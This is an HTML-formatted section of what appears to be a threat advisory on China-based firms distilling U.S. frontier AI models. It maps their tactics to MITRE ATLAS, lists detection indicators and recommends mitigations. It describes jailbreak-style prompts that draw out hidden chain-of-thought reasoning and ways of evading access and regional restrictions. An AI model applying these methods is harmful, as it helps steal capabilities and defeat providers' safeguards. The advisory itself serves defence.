&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;strong&gt;Table 2: MITRE ATLAS Mappings&lt;/strong&gt;&amp;nbsp;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;TTP Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Description&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;em&gt;&lt;strong&gt;Resource Development&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;Acquire Infrastructure&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/techniques/AML.T0008&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.T0008&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities establish and maintain sophisticated infrastructure supporting sustained extraction operations through tiered budget management and diverse supplier relationships.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities circumvent both Chinese and U.S. AI access controls through a large gray market of API proxies, or “transfer stations,” which resell access to frontier models at a fraction of the official price. In doing so, they create a scalable mechanism for evading provider safeguards and eroding traceability.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;em&gt;&lt;strong&gt;AI Model Access&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;AI Model Inference API Access&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/techniques/AML.T0040&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.T0040&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities have been exploiting AI model inference APIs through the creation of fraudulent accounts that are not registered to legitimate users. These actors leverage multiple accounts with similar registration details and payment methods, frequently switch between various AI models, and utilize third-party API aggregator services. Additionally, they execute highly coordinated queries featuring identical or similar prompt texts, demonstrating a sophistication indicative of advanced AI research. The sheer volume of requests, ranging from thousands to millions on similar topics, far exceeds legitimate use, raising significant concerns about potential misuse and compromising the integrity of AI systems.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;em&gt;&lt;strong&gt;Execution / Privilege Escalation / Defense Evasion&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;LLM Prompt Injection&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;LLM Jailbreak&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/techniques/AML.T0051&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.T0051&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/techniques/AML.T0054&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.T0054&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities have conducted prompt injection techniques against large language models (LLMs) by inserting prompts specifically designed for jailbreaking.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities craft prompts forcing models to reveal their hidden CoT reasoning (CoT or step-by-step internal reasoning that enables greater capabilities) despite U.S. models restricting CoT output visibility to users. DeepSeek employed prompts instructing models to imagine and articulate the internal reasoning behind completed responses and write it out step by step. This CoT data teaches student models, not just factual knowledge, but reasoning methodologies for complex agentic tasks, coding challenges, and logical proofs.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;em&gt;&lt;strong&gt;Discovery&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;Discovery&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/tactics/AML.TA0008&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.TA0008&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities employ aggressive, adaptive discovery to systematically identify valuable extractable data.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities demonstrate rapid operational adaptation. MiniMax redirected exchanges to a new Claude model within 24 hours of release, demonstrating real-time provider monitoring and pre-positioned infrastructure for immediate retargeting.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;em&gt;&lt;strong&gt;AI Attack Staging&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;Verify Attack&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/techniques/AML.T0042&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.T0042&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities deploy production-grade automated quality assurance pipelines with multi-modal validation, enabling rapid detection of degraded outputs and differentiation of service issues from defensive data degradation.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;em&gt;&lt;strong&gt;Collection&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;Collection&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/tactics/AML.TA0009&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.TA0009&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities systematically collect outputs to generate synthetic training datasets through continuous API querying, targeting specific knowledge domains rather than indiscriminate gathering.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;Moonshot AI used millions of exchanges targeting agentic reasoning/tool use, coding/data analysis, computer-use agent development, and computer vision, evolving from text-based distillation to extracting logical frameworks, enabling tool interaction and visual processing.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;DeepSeek used queries targeting reasoning capabilities, rubric-based grading tasks (reward model function), and censorship-safe query rewriting, extracting how U.S. models evaluate response quality.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;Campaigns span days to months with query volumes in the thousands to millions per domain, far exceeding legitimate research or development use cases.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;em&gt;&lt;strong&gt;Exfiltration&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;Exfiltration via AI&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;Inference API: Extract AI Model&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/techniques/AML.T0024.002&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.T0024.002&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities have been collecting U.S. frontier LLMs’ inferences into datasets, which can be used to train their models to mimic the behavior and performance of these LLMs.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td colspan=&quot;3&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;em&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/em&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;External Harms&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://atlas.mitre.org/techniques/AML.T0048&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.T0048&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW198784767 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW198784767 BCX8&quot;&gt;
&lt;p&gt;China-based entities inflict financial harm through systematic extraction of proprietary functionality and capabilities, causing significant economic losses. Extracting capabilities worth billions in development costs while undermining competitive advantages represents a strategic economic threat to fair technological competition and U.S. technological leadership.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Novel TTPs&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;China-based AI companies leverage techniques not in MITRE ATLAS, demonstrating significant organizational investment, operational maturity, and adaptive capability development distinguishing these campaigns from opportunistic exploitation.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Novel TTP 1: Regional restriction evasion and subscription exploitation&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Some U.S. frontier AI models are restricted for use; however, China-based AI companies access U.S. frontier AI models by employing various means to bypass the regional restrictions.&lt;/p&gt;
&lt;p&gt;After bypassing the restriction, China-based AI companies create user accounts obfuscating their country of origin and subsequentially procure bulk premium AI subscription services.&lt;/p&gt;
&lt;p&gt;StepFun structured access around pools of accounts with employees running multiple concurrent sessions, implementing load distribution to prevent quota depletion. Daily budget allocations per automated agent started at moderate levels, scaling significantly as operations matured.&lt;/p&gt;
&lt;p&gt;Detection indicators include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;shared accounts from multiple IPs/user agents,&amp;nbsp;&lt;/li&gt;
&lt;li&gt;24/7 sustained usage without human variation/idle periods,&amp;nbsp;&lt;/li&gt;
&lt;li&gt;anomalous subscription-to-API usage ratios, and&amp;nbsp;&lt;/li&gt;
&lt;li&gt;new subscriptions immediately at maximum usage as opposed to gradual AI adoption.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Novel TTP 2: Centralized request routing infrastructure&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;China-based AI companies deploy sophisticated tools that enable unified control and scalable implementation for evasion at scale. This provides model/provider abstraction, real-time health monitoring, centralized quota enforcement, and automated sanitization.&lt;/p&gt;
&lt;p&gt;China-based AI companies manage routing systems to external AI models for distillation. These routing systems direct requests through multiple pathways: native APIs, cloud providers, third-party aggregators, third-party relays, and vendor account pools.&lt;/p&gt;
&lt;p&gt;Detection indicators include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;consistent operational patterns across diverse account pools and&amp;nbsp;&lt;/li&gt;
&lt;li&gt;correlated timing/behavior across different pathways indicating unified orchestration.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Novel TTP 3: Automated request metadata sanitization&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;China-based AI companies implement automated sanitization to systematically remove organizational identifiers. This differs from &lt;a href=&quot;https://atlas.mitre.org/techniques/AML.T0065&quot; target=&quot;_blank&quot;&gt;AML.T0065&lt;/a&gt; (LLM Prompt Crafting) by operating at an infrastructure layer with automated enforcement instead of manual modification.&lt;/p&gt;
&lt;p&gt;Detection indicators include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;sudden behavioral changes following disclosures/sharing, especially abrupt disappearance of previously consistent metadata;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;absence of expected markers in high-volume campaigns where scale suggests institutional activity; and&amp;nbsp;&lt;/li&gt;
&lt;li&gt;generic/randomized patterns replacing consistent organizational indicators.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Novel TTP 4: Systematic quota and cost optimization&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;China-based AI companies systematically minimize API costs through pathway selection prioritizing cost-efficiency, centralized quota allocation/budget alignment, and account segmentation by purpose.&lt;/p&gt;
&lt;p&gt;Detection indicators include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;new accounts with anomalously high immediate hit rates suggesting bulk deployment with pre-engineered templates,&amp;nbsp;&lt;/li&gt;
&lt;li&gt;usage optimized for cache maximization versus task diversity, and&amp;nbsp;&lt;/li&gt;
&lt;li&gt;coordinated pathway switching responding to pricing/rate changes indicating centralized decision-making.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Coordinated, ecosystem-wide responses extending beyond individual company measures can help address knowledge distillation campaigns. The mitigations below incorporate mitigations from the MITRE ATLAS and National Institute of Standards and Technology (NIST) AI frameworks. Collaboration across the broader AI ecosystem, including cloud providers, API aggregators, and infrastructure providers, can enable a coordinated defense against malicious knowledge distillation campaigns.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Behavioral detection and monitoring&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;China-based AI companies leverage premium subscriptions to U.S. frontier models for knowledge distillation campaigns and code development. U.S. companies should strengthen identity verification for accounts and track individual subscriptions with enterprise-scale throughput, accounts deviating from legitimate patterns, and new accounts immediately at maximum usage versus a gradual ramp-up or with consistent quota exhaustion.&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Response alteration for suspected distillation activity&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Employing targeted changes in response to high-confidence malicious distillation requests can impose meaningful costs on knowledge distillation campaigns. Response changes, such as including differential privacy or using less sophisticated “downgraded” models to respond to distillation requests, can help protect U.S. proprietary functionalities and capabilities and reduce payoffs from distillation attempts.&amp;nbsp;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Implementation strategies&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;When suspecting a malicious distillation campaign, consider varying changes to responses across requests to complicate response quality evaluations, such that the subtle changes avoid triggering obvious alerts. Reducing reasoning depth, presenting correct information with different reasoning, or stylistic inconsistencies may evade detection while reducing training usefulness.&lt;/p&gt;
&lt;p&gt;Avoid informing China-based AI company users suspected of distillation campaigns of a switch to a downgraded model. Informing malicious distillers would enable them to improve their defense evasions and indicate when to roll back training. Instead, alter responses to users confirmed to be querying frontier models specifically for malicious knowledge distillation campaigns without informing them. In contrast, AI safety researchers and third-party evaluators should be informed of model changes while still applying strong distillation mitigations.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Cross-organization information sharing and ecosystem coordination&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Sharing information about distillation campaigns, such as indicators of infrastructure distributing operations across multiple providers, platforms, and pathways, can improve individual companies’ detection efforts. Industry disclosures document proxy networks managing tens of thousands of fraudulent accounts simultaneously, mixing distillation with unrelated customer requests across multiple providers. Community collaboration could provide defenders with more comprehensive visibility across the native APIs, cloud endpoints, and aggregators.&lt;/p&gt;
&lt;p&gt;Sharing information about distillation enables and enhances correlation otherwise unachievable by individual organizations, through sharing infrastructure indicators (IPs, domains, third-party service providers) and behavioral indicators (timing correlations, query volume patterns).&lt;/p&gt;
&lt;p&gt;Multi-source correlated activity enables more confident attribution of malicious knowledge distillation campaigns, justifying response degradation with lower-to-no legitimate user risk.&lt;/p&gt;
&lt;p&gt;Sharing infrastructure and behavioral indicators between cloud providers, model aggregators, and model providers can make distributed infrastructure visible as coordinated campaigns versus isolated anomalies. Additionally, sharing can provide cloud and routing companies with actionable indicators for identifying and mitigating malicious activity.&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW94261203 BCX8&quot;&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;MITRE ATLAS mitigations&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0015&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0015&lt;/u&gt;&lt;/a&gt; - Predictive AI Adversarial Input Detection: Detect/block atypical queries deviating from benign patterns, exhibiting previous adversary technique characteristics, or originating from malicious IPs.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0004&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0004&lt;/u&gt;&lt;/a&gt; - Limit AI Service Query Volume and Rate: Per-key/IP quotas, rate limits, progressive throttling. Adversaries seem to be sensitive to rate limits since they implement sophisticated strategies to work within constraints.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0019&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0019&lt;/u&gt;&lt;/a&gt; - Control Access to AI Models and Data in Production: User verification, authenticated API access, policy monitoring. This addresses fraudulent account pool exploitation.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0024&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0024&lt;/u&gt;&lt;/a&gt; - AI Telemetry Logging: Log inputs/outputs for threat detection/forensics. This is foundational for behavioral detection and enables correlation with intelligence.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0002&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0002&lt;/u&gt;&lt;/a&gt; - Predictive AI Output Obfuscation: Reduce fidelity of responses (withhold logits/confidences, shorten responses, targeted redaction). Balance security with user experience.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0035&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0035&lt;/u&gt;&lt;/a&gt; – AI Red Team: Adversarial testing, extraction simulation, telemetry monitoring. Validates detection efficacy.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0015&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0015&lt;/u&gt;&lt;/a&gt; - Predictive AI Adversarial Input Detection: Sanitize/validate inputs preventing prompt injections. This addresses jailbreak and injection attempts to elicit reasoning traces and system prompts.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0000&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0000&lt;/u&gt;&lt;/a&gt; - Limit Public Information Release: Limit disclosure of architecture, prompt templates, and system instructions.&amp;nbsp;&lt;/li&gt;
